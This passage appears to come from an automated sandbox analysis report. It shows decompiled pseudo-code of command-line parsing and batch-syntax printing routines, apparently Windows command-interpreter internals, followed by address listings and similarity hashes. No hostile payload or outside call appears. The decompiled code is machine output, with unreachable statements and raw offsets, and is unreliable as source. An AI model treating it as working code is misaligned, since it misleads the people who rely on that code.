								_t193 = _t193 + 8;
								_t129 = _v220;
								if(_t135 == 0) {
									_t164 = _v224;
									goto L9;
								}
							}
							_t185 =  &(_t185[1]);
							if(_t129 < 0x63) {
								continue;
							}
							break;
						}
						_t183 = _v228;
						_t130 = _t129 + _t129;
						if(_t130 >= 0xc8) {
							E002B711D(_t130, _t136, _t164, _t179, _t183, _t186);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t191);
							_push(_t136);
							_push(_t186);
							_v264 = 0;
							_push(_t183);
							__eflags = 0;
							_v260 =  &_v264;
							_t136 = E002AE9A0(0, 0);
							_v268 = _t136;
							goto L62;
						} else {
							_v224 = 1;
							 *((short*)(_t191 + _t130 - 0xd4)) = 0;
							_t134 =  *_t186 & 0x0000ffff;
							_v220 = 1;
							if(_t134 != 0) {
								_t144 = _t134;
								L14:
								if(_t144 == 0x22) {
									L17:
									_v224 = 0;
									if(_t136 == 0) {
										L19:
										 *_t180 =  *_t186;
										_t180 = _t180 + 2;
										if( *_t186 == 0x22) {
											while(1) {
												_t81 = _t186[1];
												_t143 = _t186;
												_t186 =  &(_t186[1]);
												 *_t180 = _t81;
												_t180 = _t180 + 2;
												_t82 =  *_t186 & 0x0000ffff;
												__eflags = _t82;
												if(_t82 == 0) {
													break;
												}
												__eflags = _t82 - 0x22;
												if(_t82 == 0x22) {
													goto L20;
												} else {
													__eflags = _t186[1];
													if(_t186[1] != 0) {
														continue;
													} else {
														goto L20;
													}
												}
												goto L22;
											}
											_t186 = _t143;
										}
										L20:
										_v220 = 0;
									} else {
										_t85 = wcschr(_t136,  *_t186 & 0x0000ffff);
										_t193 = _t193 + 8;
										if(_t85 != 0) {
											_t86 = _a4;
											__eflags = _t86 & 0x00000002;
											if((_t86 & 0x00000002) != 0) {
												__eflags = _v220;
												_t87 =  *_t186 & 0x0000ffff;
												if(_v220 == 0) {
													_t180 = _t180 + 2;
												}
												 *_t180 = _t87;
												_v220 = 1;
												_t180 = _t180 + 4;
											} else {
												__eflags = _t86 & 0x00000004;
												if((_t86 & 0x00000004) != 0) {
													 *_t180 =  *_t186;
												}
												_v220 = 0;
												_t180 = _t180 + 2;
											}
										} else {
											goto L19;
										}
									}
									_t83 = _t186[1] & 0x0000ffff;
									_t186 =  &(_t186[1]);
									_t144 = _t83;
									if(_t83 != 0) {
										goto L14;
									}
								} else {
									_t89 = iswspace(_t144);
									_t193 = _t193 + 4;
									if(_t89 != 0) {
										L24:
										_t90 = _a4;
										__eflags = _t90 & 0x00000001;
										if((_t90 & 0x00000001) != 0) {
											__eflags = _v224;
											if(_v224 == 0) {
												goto L17;
											} else {
												goto L25;
											}
										} else {
											L25:
											_t91 = _t90 & 0x00000002;
											__eflags = _t91;
											_v228 = _t91;
											if(_t91 == 0) {
												L28:
												_t93 = _a4 & 0x00000004;
												__eflags = _t93;
												_v232 = _t93;
												if(_t93 != 0) {
													L96:
													_t79 = E002AD7D4(_t136,  *_t186);
													__eflags = _t79;
													if(_t79 != 0) {
														goto L17;
													} else {
														goto L29;
													}
												} else {
													L29:
													_t94 =  *_t186 & 0x0000ffff;
													__eflags = _t94;
													if(_t94 != 0) {
														_t160 = _t94;
														while(1) {
															__eflags = _t160 - 0x22;
															if(_t160 == 0x22) {
																break;
															}
															_t114 = iswspace(_t160);
															_t193 = _t193 + 4;
															__eflags = _t114;
															if(_t114 != 0) {
																L39:
																__eflags = _v228;
																if(_v228 == 0) {
																	L42:
																	__eflags = _v232;
																	if(_v232 != 0) {
																		_t115 = E002AD7D4(_t136,  *_t186);
																		__eflags = _t115;
																		if(_t115 != 0) {
																			break;
																		} else {
																			goto L43;
																		}
																	} else {
																		L43:
																		_t116 = _t186[1] & 0x0000ffff;
																		_t186 =  &(_t186[1]);
																		_t160 = _t116;
																		__eflags = _t116;
																		if(_t116 != 0) {
																			continue;
																		} else {
																		}
																	}
																} else {
																	__eflags = _t136;
																	if(_t136 == 0) {
																		goto L42;
																	} else {
																		_t118 = wcschr(_t136,  *_t186 & 0x0000ffff);
																		_t193 = _t193 + 8;
																		__eflags = _t118;
																		if(_t118 != 0) {
																			break;
																		} else {
																			goto L42;
																		}
																	}
																}
															} else {
																_t121 = wcschr( &_v216,  *_t186 & 0x0000ffff);
																_t193 = _t193 + 8;
																__eflags = _t121;
																if(_t121 != 0) {
																	goto L39;
																} else {
																	break;
																}
															}
															goto L22;
														}
														__eflags =  *_t186;
														if( *_t186 != 0) {
															__eflags = _v224;
															if(_v224 == 0) {
																__eflags = _v220;
																if(_v220 == 0) {
																	_t180 = _t180 + 2;
																	__eflags = _t180;
																}
															}
															_v220 = 1;
															goto L17;
														}
													}
												}
											} else {
												__eflags = _t136;
												if(_t136 == 0) {
													goto L28;
												} else {
													_t123 = wcschr(_t136,  *_t186 & 0x0000ffff);
													_t193 = _t193 + 8;
													__eflags = _t123;
													if(_t123 != 0) {
														goto L17;
													} else {
														goto L28;
													}
												}
											}
										}
									} else {
										_t126 = wcschr( &_v216,  *_t186 & 0x0000ffff);
										_t193 = _t193 + 8;
										if(_t126 != 0) {
											goto L24;
										} else {
											goto L17;
										}
									}
								}
							}
							L22:
							_t145 = _v236;
							_t180 = _t180 - _t145 >> 1;
							_t167 = 4 + _t180 * 2;
							if(E002B0100(_t145, 4 + _t180 * 2) == 0) {
								E002C9287(_t145);
								__imp__longjmp(0x2db8b8, 1);
								asm("int3");
								L102:
								_t169 = _t145 + 2;
								do {
									_t96 =  *_t145;
									_t145 = _t145 + 2;
									__eflags = _t96;
								} while (_t96 != 0);
								_t183 = _t180 + (_t145 - _t169 >> 1);
								L68:
								_t148 = _t183 + _t183;
								_t187 = E002B00B0(_t183 + _t183);
								_v8 = _t187;
								__eflags = _t187;
								if(_t187 == 0) {
									E002C9287(_t148);
									__imp__longjmp(0x2db8b8, 1);
									asm("int3");
									__eflags =  *0x2dfa90;
									if( *0x2dfa90 != 0) {
										E002C82EB(_t148);
									}
									__eflags = 0;
									__eflags =  *0x2dfa88;
									 *0x2cd5c8 = 0;
									if( *0x2dfa88 != 0) {
										E002C8121(_t187, 0);
									}
									return _t187;
								}
								_t150 = _t136[0xf];
								__eflags = _t150;
								if(_t150 != 0) {
									E002B1040(_t187, _t183, _t150);
								}
								_t104 = 0;
								__eflags = _t183;
								if(_t183 == 0) {
									L106:
									_t104 = 0x80070057;
								} else {
									__eflags = _t183 - 0x7fffffff;
									if(_t183 > 0x7fffffff) {
										goto L106;
									}
								}
								__eflags = _t104;
								if(_t104 < 0) {
									L109:
									_t172 = 0;
								} else {
									_t104 = 0;
									_t159 = _t183;
									_t173 = _t187;
									__eflags = _t183;
									if(_t183 == 0) {
										L108:
										_t104 = 0x80070057;
										goto L109;
									} else {
										while(1) {
											__eflags =  *_t173 - _t104;
											if( *_t173 == _t104) {
												break;
											}
											_t173 = _t173 + 2;
											_t159 = _t159 - 1;
											__eflags = _t159;
											if(_t159 != 0) {
												continue;
											} else {
												goto L108;
											}
											goto L114;
										}
										__eflags = _t159;
										if(_t159 == 0) {
											goto L108;
										} else {
											_t172 = _t183 - _t159;
											__eflags = _t172;
										}
									}
								}
								__eflags = _t104;
								if(_t104 >= 0) {
									_t113 = _v8 + _t172 * 2;
									_t190 = _t183 - _t172;
									__eflags = _t190;
									if(_t190 == 0) {
										L83:
										_t113 = _t113 - 2;
									} else {
										_t177 = _t172 + 0x7ffffffe + _t190 - _t183;
										_t183 = 0x2dfaa0 - _t113;
										__eflags = 0x2dfaa0;
										while(1) {
											__eflags = _t177;
											if(_t177 == 0) {
												break;
											}
											_t158 =  *(_t113 + _t183) & 0x0000ffff;
											__eflags = _t158;
											if(_t158 == 0) {
												break;
											} else {
												 *_t113 = _t158;
												_t177 = _t177 - 1;
												_t113 =  &(_t113[0]);
												_t190 = _t190 - 1;
												__eflags = _t190;
												if(_t190 != 0) {
													continue;
												} else {
													goto L83;
												}
											}
											goto L85;
										}
										__eflags = _t190;
										if(_t190 == 0) {
											goto L83;
										}
									}
									L85:
									_t187 = _v8;
									__eflags = 0;
									 *_t113 = 0;
								}
								_t136[0xf] = _t187;
								while(1) {
									L62:
									_t105 = E002AEEC8();
									__eflags = _t105;
									if(_t105 == 0) {
										break;
									}
									_t108 = E002AF030(1);
									__eflags = _t108 - 0x4000;
									if(_t108 == 0x4000) {
										_t145 = _t136[0xf];
										_t180 =  *0x2dfa8c;
										__eflags = _t145;
										if(_t145 != 0) {
											goto L102;
										}
										goto L68;
									} else {
										_t188 = _v12;
										_t109 = E002B02B0(_t136, _t188, _t183, _t188);
										__eflags = _t109;
										if(_t109 != 0) {
											_t110 =  *_t188;
											do {
												_t69 = _t110 + 0x14; // 0x14
												_t137 = _t69;
												_t110 =  *_t137;
												_v12 = _t137;
												__eflags = _t110;
											} while (_t110 != 0);
											_t136 = _v20;
											continue;
										} else {
											__eflags = 0;
											E002AF300(_t109, 0, 0, _t109);
										}
									}
									break;
								}
								_t136[0xd] = _v16;
								return _t136;
							} else {
								L23:
								return E002B6FD0(_t75, _t136, _v12 ^ _t191, _t167, _t180, _t186);
							}
						}
					}
				}
				goto L114;
			}














































































                                              0x002aea40
                                              0x002aea40
                                              0x002aea4b
                                              0x002aea52
                                              0x002aea57
                                              0x002aea59
                                              0x002aea5e
                                              0x002aed52
                                              0x002aed57
                                              0x002aed5c
                                              0x002aed5e
                                              0x00000000
                                              0x002aed64
                                              0x002bc03d
                                              0x002bc049
                                              0x00000000
                                              0x002bc049
                                              0x002aea64
                                              0x002aea64
                                              0x002aea64
                                              0x002aea67
                                              0x002aea67
                                              0x002aea6a
                                              0x002aea6d
                                              0x002aea76
                                              0x002aea7d
                                              0x002aea82
                                              0x002aea8a
                                              0x002bc04f
                                              0x002bc04f
                                              0x002bc05b
                                              0x00000000
                                              0x002aea90
                                              0x002aea90
                                              0x002aea96
                                              0x002aea9b
                                              0x002aea9d
                                              0x002aeaa3
                                              0x002aeaa3
                                              0x002aeaa6
                                              0x002aeaaf
                                              0x00000000
                                              0x00000000
                                              0x002aeab3
                                              0x002aead0
                                              0x002aead0
                                              0x002aead8
                                              0x002aead9
                                              0x002aeab5
                                              0x002aeab7
                                              0x002aeabd
                                              0x002aeac2
                                              0x002aeac8
                                              0x002aeaca
                                              0x00000000
                                              0x002aeaca
                                              0x002aeac8
                                              0x002aeadf
                                              0x002aeae5
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002aeae5
                                              0x002aeae7
                                              0x002aeaed
                                              0x002aeaf4
                                              0x002aed75
                                              0x002aed7a
                                              0x002aed7b
                                              0x002aed7c
                                              0x002aed7d
                                              0x002aed7e
                                              0x002aed7f
                                              0x002aed82
                                              0x002aed88
                                              0x002aed89
                                              0x002aed8d
                                              0x002aed94
                                              0x002aed95
                                              0x002aed97
                                              0x002aed9f
                                              0x002aeda1
                                              0x00000000
                                              0x002aeafa
                                              0x002aeafc
                                              0x002aeb06
                                              0x002aeb0e
                                              0x002aeb11
                                              0x002aeb1e
                                              0x002aeb24
                                              0x002aeb26
                                              0x002aeb2a
                                              0x002aeb5a
                                              0x002aeb5a
                                              0x002aeb66
                                              0x002aeb7e
                                              0x002aeb81
                                              0x002aeb84
                                              0x002aeb8b
                                              0x002aecf0
                                              0x002aecf0
                                              0x002aecf4
                                              0x002aecf6
                                              0x002aecf9
                                              0x002aecfc
                                              0x002aecff
                                              0x002aed02
                                              0x002aed05
                                              0x00000000
                                              0x00000000
                                              0x002aed07
                                              0x002aed0a
                                              0x00000000
                                              0x002aed10
                                              0x002aed10
                                              0x002aed15
                                              0x00000000
                                              0x002aed17
                                              0x00000000
                                              0x002aed17
                                              0x002aed15
                                              0x00000000
                                              0x002aed0a
                                              0x002aed6e
                                              0x002aed6e
                                              0x002aeb91
                                              0x002aeb91
                                              0x002aeb68
                                              0x002aeb6d
                                              0x002aeb73
                                              0x002aeb78
                                              0x002aeccd
                                              0x002aecd0
                                              0x002aecd2
                                              0x002aed1c
                                              0x002aed23
                                              0x002aed26
                                              0x002aed69
                                              0x002aed69
                                              0x002aed28
                                              0x002aed2e
                                              0x002aed38
                                              0x002aecd4
                                              0x002aecd4
                                              0x002aecd6
                                              0x002bc092
                                              0x002bc092
                                              0x002aecdc
                                              0x002aece6
                                              0x002aece6
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002aeb78
                                              0x002aeb9b
                                              0x002aeb9f
                                              0x002aeba2
                                              0x002aeba7
                                              0x00000000
                                              0x00000000
                                              0x002aeb2c
                                              0x002aeb2d
                                              0x002aeb33
                                              0x002aeb38
                                              0x002aebde
                                              0x002aebde
                                              0x002aebe1
                                              0x002aebe3
                                              0x002aed40
                                              0x002aed47
                                              0x00000000
                                              0x002aed4d
                                              0x00000000
                                              0x002aed4d
                                              0x002aebe9
                                              0x002aebe9
                                              0x002aebe9
                                              0x002aebe9
                                              0x002aebec
                                              0x002aebf2
                                              0x002aec0e
                                              0x002aec11
                                              0x002aec11
                                              0x002aec14
                                              0x002aec1a
                                              0x002bc061
                                              0x002bc066
                                              0x002bc06b
                                              0x002bc06d
                                              0x00000000
                                              0x002bc073
                                              0x00000000
                                              0x002bc073
                                              0x002aec20
                                              0x002aec20
                                              0x002aec20
                                              0x002aec23
                                              0x002aec26
                                              0x002aec28
                                              0x002aec30
                                              0x002aec30
                                              0x002aec34
                                              0x00000000
                                              0x00000000
                                              0x002aec37
                                              0x002aec3d
                                              0x002aec40
                                              0x002aec42
                                              0x002aec8a
                                              0x002aec8a
                                              0x002aec91
                                              0x002aeca9
                                              0x002aeca9
                                              0x002aecb0
                                              0x002bc07d
                                              0x002bc082
                                              0x002bc084
                                              0x00000000
                                              0x002bc08a
                                              0x00000000
                                              0x002bc08a
                                              0x002aecb6
                                              0x002aecb6
                                              0x002aecb6
                                              0x002aecba
                                              0x002aecbd
                                              0x002aecbf
                                              0x002aecc2
                                              0x00000000
                                              0x00000000
                                              0x002aecc8
                                              0x002aecc2
                                              0x002aec93
                                              0x002aec93
                                              0x002aec95
                                              0x00000000
                                              0x002aec97
                                              0x002aec9c
                                              0x002aeca2
                                              0x002aeca5
                                              0x002aeca7
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002aeca7
                                              0x002aec95
                                              0x002aec44
                                              0x002aec4f
                                              0x002aec55
                                              0x002aec58
                                              0x002aec5a
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002aec5a
                                              0x00000000
                                              0x002aec42
                                              0x002aec5c
                                              0x002aec60
                                              0x002aec66
                                              0x002aec6d
                                              0x002aec6f
                                              0x002aec76
                                              0x002aec78
                                              0x002aec78
                                              0x002aec78
                                              0x002aec76
                                              0x002aec7b
                                              0x00000000
                                              0x002aec7b
                                              0x002aec60
                                              0x002aec26
                                              0x002aebf4
                                              0x002aebf4
                                              0x002aebf6
                                              0x00000000
                                              0x002aebf8
                                              0x002aebfd
                                              0x002aec03
                                              0x002aec06
                                              0x002aec08
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002aec08
                                              0x002aebf6
                                              0x002aebf2
                                              0x002aeb3e
                                              0x002aeb49
                                              0x002aeb4f
                                              0x002aeb54
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002aeb54
                                              0x002aeb38
                                              0x002aeb2a
                                              0x002aebad
                                              0x002aebad
                                              0x002aebb5
                                              0x002aebb7
                                              0x002aebc5
                                              0x002bc09a
                                              0x002bc0a6
                                              0x002bc0ac
                                              0x002bc0ad
                                              0x002bc0ad
                                              0x002bc0b0
                                              0x002bc0b0
                                              0x002bc0b3
                                              0x002bc0b6
                                              0x002bc0b6
                                              0x002bc0bf
                                              0x002aedfa
                                              0x002aedfa
                                              0x002aee02
                                              0x002aee04
                                              0x002aee07
                                              0x002aee09
                                              0x002bc0f7
                                              0x002bc103
                                              0x002bc109
                                              0x002bc10a
                                              0x002bc111
                                              0x002bc117
                                              0x002bc117
                                              0x002aefe1
                                              0x002aefe3
                                              0x002aefea
                                              0x002aefef
                                              0x002bc125
                                              0x002bc125
                                              0x00000000
                                              0x002aeff5
                                              0x002aee0f
                                              0x002aee12
                                              0x002aee14
                                              0x002bc0cb
                                              0x002bc0cb
                                              0x002aee1a
                                              0x002aee1c
                                              0x002aee1e
                                              0x002bc0d5
                                              0x002bc0d5
                                              0x002aee24
                                              0x002aee24
                                              0x002aee2a
                                              0x00000000
                                              0x00000000
                                              0x002aee2a
                                              0x002aee30
                                              0x002aee32
                                              0x002bc0f0
                                              0x002bc0f0
                                              0x002aee38
                                              0x002aee38
                                              0x002aee3a
                                              0x002aee3c
                                              0x002aee3e
                                              0x002aee40
                                              0x002bc0eb
                                              0x002bc0eb
                                              0x00000000
                                              0x002aee46
                                              0x002aee46
                                              0x002aee46
                                              0x002aee49
                                              0x00000000
                                              0x00000000
                                              0x002bc0df
                                              0x002bc0e2
                                              0x002bc0e2
                                              0x002bc0e5
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002bc0e5
                                              0x002aee4f
                                              0x002aee51
                                              0x00000000
                                              0x002aee57
                                              0x002aee59
                                              0x002aee59
                                              0x002aee59
                                              0x002aee51
                                              0x002aee40
                                              0x002aee5b
                                              0x002aee5d
                                              0x002aee64
                                              0x002aee67
                                              0x002aee67
                                              0x002aee69
                                              0x002aee99
                                              0x002aee99
                                              0x002aee6b
                                              0x002aee7a
                                              0x002aee7c
                                              0x002aee7c
                                              0x002aee80
                                              0x002aee80
                                              0x002aee82
                                              0x00000000
                                              0x00000000
                                              0x002aee84
                                              0x002aee88
                                              0x002aee8b
                                              0x00000000
                                              0x002aee8d
                                              0x002aee8d
                                              0x002aee90
                                              0x002aee91
                                              0x002aee94
                                              0x002aee94
                                              0x002aee97
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002aee97
                                              0x00000000
                                              0x002aee8b
                                              0x002aee9e
                                              0x002aeea0
                                              0x00000000
                                              0x00000000
                                              0x002aeea0
                                              0x002aeea2
                                              0x002aeea2
                                              0x002aeea5
                                              0x002aeea7
                                              0x002aeea7
                                              0x002aeeaa
                                              0x002aeda4
                                              0x002aeda4
                                              0x002aeda4
                                              0x002aeda9
                                              0x002aedab
                                              0x00000000
                                              0x00000000
                                              0x002aedb2
                                              0x002aedb7
                                              0x002aedbc
                                              0x002aede9
                                              0x002aedec
                                              0x002aedf2
                                              0x002aedf4
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002aedbe
                                              0x002aedbe
                                              0x002aedc3
                                              0x002aedc8
                                              0x002aedca
                                              0x002aeeb2
                                              0x002aeeb4
                                              0x002aeeb4
                                              0x002aeeb4
                                              0x002aeeb7
                                              0x002aeeb9
                                              0x002aeebc
                                              0x002aeebc
                                              0x002aeec0
                                              0x00000000
                                              0x002aedd0
                                              0x002aedd3
                                              0x002aedd5
                                              0x002aedd5
                                              0x002aedca
                                              0x00000000
                                              0x002aedbc
                                              0x002aedde
                                              0x002aede8
                                              0x002aebcb
                                              0x002aebcb
                                              0x002aebdb
                                              0x002aebdb
                                              0x002aebc5
                                              0x002aeaf4
                                              0x002aea8a
                                              0x00000000

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: wcschr$iswspacelongjmp
                                              • String ID: =,;
                                              • API String ID: 4008636219-1539845467
                                              • Opcode ID: 6991c9068918179eb6f64300e8c6cf55da7a0f8212004bd5eb2d985b897141af
                                              • Instruction ID: 348a15f2bc243e14bffe04f8c78e19ebb852132503a0409a3b8bef6a2332eed2
                                              • Opcode Fuzzy Hash: 6991c9068918179eb6f64300e8c6cf55da7a0f8212004bd5eb2d985b897141af
                                              • Instruction Fuzzy Hash: F9D13971A30212C7DF349F64D9897BA73A5EF51344F16486BEC4697280EF748DA2CB60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002A9835, Relevance: 23.0, APIs: 1, Strings: 12, Instructions: 300COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 76%
                                              			E002A9835(intOrPtr* __ecx, void* __edx, intOrPtr _a4) {
				void* _v8;
				void* __ebx;
				void* __ebp;
				intOrPtr _t76;
				intOrPtr _t87;
				intOrPtr _t90;
				signed int _t91;
				signed char _t103;
				signed int _t107;
				intOrPtr _t108;
				signed int _t125;
				signed int _t144;
				intOrPtr* _t179;
				void* _t182;

				_t153 = __edx;
				_t123 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t179 = __ecx;
				_t114 = 0;
				_t182 = __edx;
				_v8 = 0;
				_t76 =  *__ecx;
				if(_t76 > 0x37) {
					__eflags = _t76 - 0x38;
					if(__eflags == 0) {
						E002A9899(0, _a4,  *((intOrPtr*)(__ecx + 0x38)), 1);
						L78:
						_t125 =  *(_t179 + 0x3c);
						L79:
						E002A9835(_t125, _t182, _a4);
						L7:
						return 0;
					}
					if(__eflags <= 0) {
						L54:
						__imp__longjmp(0x2db8f8, 0xffffffff);
						L55:
						E002A9899(_t114, _a4, "(", _t114);
						_v8 = ")";
						L60:
						E002A9835( *((intOrPtr*)(_t179 + 0x38)), _t182, _a4);
						_t60 =  &_v8; // 0x2a2168
						E002A9899(_t114, _a4,  *_t60, _t114);
						__eflags =  *_t179 - 0x33;
						if( *_t179 == 0x33) {
							goto L7;
						}
						__eflags =  *_t179 - 0x3b;
						if( *_t179 == 0x3b) {
							goto L7;
						}
						goto L78;
					}
					__eflags = _t76 - 0x3a;
					if(_t76 <= 0x3a) {
						_v8 = L"== ";
						__eflags =  *0x2e3cc9;
						if( *0x2e3cc9 != 0) {
							_t87 =  *((intOrPtr*)(__ecx + 0x44));
							__eflags = _t87 - 1;
							if(_t87 != 1) {
								__eflags = _t87 - 2;
								if(_t87 != 2) {
									__eflags = _t87 - 3;
									if(_t87 != 3) {
										__eflags = _t87 - 4;
										if(_t87 != 4) {
											__eflags = _t87 - 5;
											if(_t87 != 5) {
												__eflags = _t87 - 6;
												if(_t87 == 6) {
													_v8 = L"GEQ ";
												}
											} else {
												_v8 = L"GTR ";
											}
										} else {
											_v8 = L"LEQ ";
										}
									} else {
										_v8 = L"LSS ";
									}
								} else {
									_v8 = L"NEQ ";
								}
							} else {
								_v8 = L"EQU ";
							}
						}
						E002A9899(1, _a4,  *((intOrPtr*)(_t179 + 0x38)), 1);
						_t114 = 0;
						_push(0);
						_push(_v8);
						L4:
						E002A9899(_t114, _a4);
						if( *(_t179 + 0x3c) != _t114) {
							E002A9899(_t114, _a4,  *(_t179 + 0x3c), _t114);
						}
						E002A9CA6(_t179, _t182, _a4);
						goto L7;
					}
					__eflags = _t76 - 0x3b;
					if(_t76 == 0x3b) {
						L13:
						E002A9CA6(_t123, _t153, _a4);
						_t114 = 1;
						__eflags =  *_t179 - 0x2e;
						if( *_t179 < 0x2e) {
							goto L60;
						}
						__eflags =  *_t179 - 0x2f;
						if( *_t179 <= 0x2f) {
							_v8 = "&";
							goto L60;
						}
						__eflags =  *_t179 - 0x30;
						if( *_t179 == 0x30) {
							_v8 = L"||";
							goto L60;
						}
						__eflags =  *_t179 - 0x31;
						if( *_t179 == 0x31) {
							_v8 = L"&&";
							goto L60;
						}
						__eflags =  *_t179 - 0x32;
						if( *_t179 == 0x32) {
							_v8 = "|";
							goto L60;
						}
						__eflags =  *_t179 - 0x33;
						if( *_t179 == 0x33) {
							goto L55;
						} else {
							__eflags =  *_t179 - 0x3b;
							if( *_t179 == 0x3b) {
								E002A9899(1, _a4, "@", 1);
								_v8 = " ";
							}
							goto L60;
						}
					}
					__eflags = _t76 - 0x3c;
					if(_t76 != 0x3c) {
						goto L54;
					}
					_t90 =  *0x2e8510;
					__eflags = _t90 - 0x2396;
					if(_t90 != 0x2396) {
						__eflags = _t90 - 0x2395;
						if(_t90 != 0x2395) {
							__eflags = _t90 - 0x2390;
							if(_t90 != 0x2390) {
								goto L54;
							}
							_t91 = L"REM /?";
							L53:
							E002A9899(_t114, _a4, _t91, 1);
							goto L7;
						}
						_t91 = L"IF /?";
						goto L53;
					}
					_t91 = L"FOR /?";
					goto L53;
				}
				if(_t76 >= 0x34 || _t76 == 0) {
					L3:
					_push(1);
					_push( *((intOrPtr*)(_t179 + 0x38)));
					goto L4;
				} else {
					__eflags = _t76 - 0x2b;
					if(_t76 == 0x2b) {
						E002A9899(1, _a4, L"FOR", 1);
						__eflags =  *0x2e3cc9;
						if( *0x2e3cc9 == 0) {
							L41:
							E002A9899(1, _a4,  *((intOrPtr*)(_t179 + 0x38)) + 6, 1);
							E002A9899(1, _a4, "(", 1);
							E002A9899(1, _a4,  *(_t179 + 0x3c), 0);
							E002A9899(1, _a4, ")", 0);
							E002A9899(1, _a4,  *((intOrPtr*)(_t179 + 0x38)) + 0x2c, 1);
							_t125 =  *(_t179 + 0x40);
							goto L79;
						}
						_t103 =  *(__ecx + 0x48);
						__eflags = 1 & _t103;
						if((1 & _t103) == 0) {
							__eflags = _t103 & 0x00000002;
							if((_t103 & 0x00000002) == 0) {
								__eflags = _t103 & 0x00000008;
								if((_t103 & 0x00000008) == 0) {
									__eflags = _t103 & 0x00000004;
									if((_t103 & 0x00000004) == 0) {
										goto L41;
									}
									_push(1);
									_push(L"/R");
									L38:
									E002A9899(1, _a4);
									__eflags =  *(_t179 + 0x4c);
									if( *(_t179 + 0x4c) == 0) {
										goto L41;
									}
									_push(1);
									_push( *(_t179 + 0x4c));
									goto L40;
								}
								_push(1);
								_push(L"/F");
								goto L38;
							}
							_push(1);
							_push(L"/D");
							goto L40;
						} else {
							_push(1);
							_push(L"/L");
							L40:
							E002A9899(1, _a4);
							goto L41;
						}
					}
					__eflags = _t76 - 0x2c;
					if(_t76 == 0x2c) {
						E002A9899(1, _a4,  *((intOrPtr*)(__ecx + 0x38)), 1);
						_t107 =  *(__ecx + 0x3c);
						_t144 = 0;
						__eflags =  *_t107 - 0x38;
						if( *_t107 == 0x38) {
							_t108 =  *((intOrPtr*)(_t107 + 0x3c));
							__eflags =  *((intOrPtr*)(_t108 + 0x40)) - 2;
							_t107 =  *(__ecx + 0x3c);
							if( *((intOrPtr*)(_t108 + 0x40)) == 2) {
								_t144 = L"/I";
							}
						} else {
							asm("sbb ecx, ecx");
							_t144 =  !( ~( *((intOrPtr*)(_t107 + 0x40)) - 2)) & L"/I";
						}
						__eflags = _t144;
						if(_t144 != 0) {
							E002A9899(1, _a4, _t144, 1);
							_t107 =  *(_t179 + 0x3c);
						}
						E002A9835(_t107, _t182, _a4);
						E002A9835( *(_t179 + 0x40), _t182, _a4);
						__eflags =  *(_t179 + 0x48);
						if( *(_t179 + 0x48) == 0) {
							goto L7;
						} else {
							E002A9899(1, _a4,  *((intOrPtr*)(_t179 + 0x44)), 1);
							_t125 =  *(_t179 + 0x48);
							goto L79;
						}
					}
					__eflags = _t76 - 0x2d;
					if(__eflags == 0) {
						goto L3;
					}
					if(__eflags <= 0) {
						goto L54;
					}
					__eflags = _t76 - 0x33;
					if(_t76 > 0x33) {
						goto L54;
					}
					goto L13;
				}
			}

















                                              0x002a9835
                                              0x002a9835
                                              0x002a983a
                                              0x002a983b
                                              0x002a983f
                                              0x002a9841
                                              0x002a9843
                                              0x002a9845
                                              0x002a9848
                                              0x002a984d
                                              0x002c0ed1
                                              0x002c0ed4
                                              0x002c1036
                                              0x002c103b
                                              0x002c103b
                                              0x002c103e
                                              0x002c1043
                                              0x002a988e
                                              0x002a9896
                                              0x002a9896
                                              0x002c0eda
                                              0x002c0f32
                                              0x002c0f39
                                              0x002c0f3f
                                              0x002c0f4a
                                              0x002c0f4f
                                              0x002c0f7a
                                              0x002c0f82
                                              0x002c0f8d
                                              0x002c0f90
                                              0x002c0f95
                                              0x002c0f98
                                              0x00000000
                                              0x00000000
                                              0x002c0f9e
                                              0x002c0fa1
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002c0fa7
                                              0x002c0edc
                                              0x002c0edf
                                              0x002c0fae
                                              0x002c0fb6
                                              0x002c0fbd
                                              0x002c0fbf
                                              0x002c0fc2
                                              0x002c0fc4
                                              0x002c0fcf
                                              0x002c0fd2
                                              0x002c0fdd
                                              0x002c0fe0
                                              0x002c0feb
                                              0x002c0fee
                                              0x002c0ff9
                                              0x002c0ffc
                                              0x002c1007
                                              0x002c100a
                                              0x002c100c
                                              0x002c100c
                                              0x002c0ffe
                                              0x002c0ffe
                                              0x002c0ffe
                                              0x002c0ff0
                                              0x002c0ff0
                                              0x002c0ff0
                                              0x002c0fe2
                                              0x002c0fe2
                                              0x002c0fe2
                                              0x002c0fd4
                                              0x002c0fd4
                                              0x002c0fd4
                                              0x002c0fc6
                                              0x002c0fc6
                                              0x002c0fc6
                                              0x002c0fc4
                                              0x002c101c
                                              0x002c1021
                                              0x002c1023
                                              0x002c1024
                                              0x002a9865
                                              0x002a986a
                                              0x002a9872
                                              0x002a987d
                                              0x002a987d
                                              0x002a9889
                                              0x00000000
                                              0x002a9889
                                              0x002c0ee5
                                              0x002c0ee8
                                              0x002c0d18
                                              0x002c0d1b
                                              0x002c0d22
                                              0x002c0d23
                                              0x002c0d26
                                              0x00000000
                                              0x00000000
                                              0x002c0d2c
                                              0x002c0d2f
                                              0x002c0f73
                                              0x00000000
                                              0x002c0f73
                                              0x002c0d35
                                              0x002c0d38
                                              0x002c0f6a
                                              0x00000000
                                              0x002c0f6a
                                              0x002c0d3e
                                              0x002c0d41
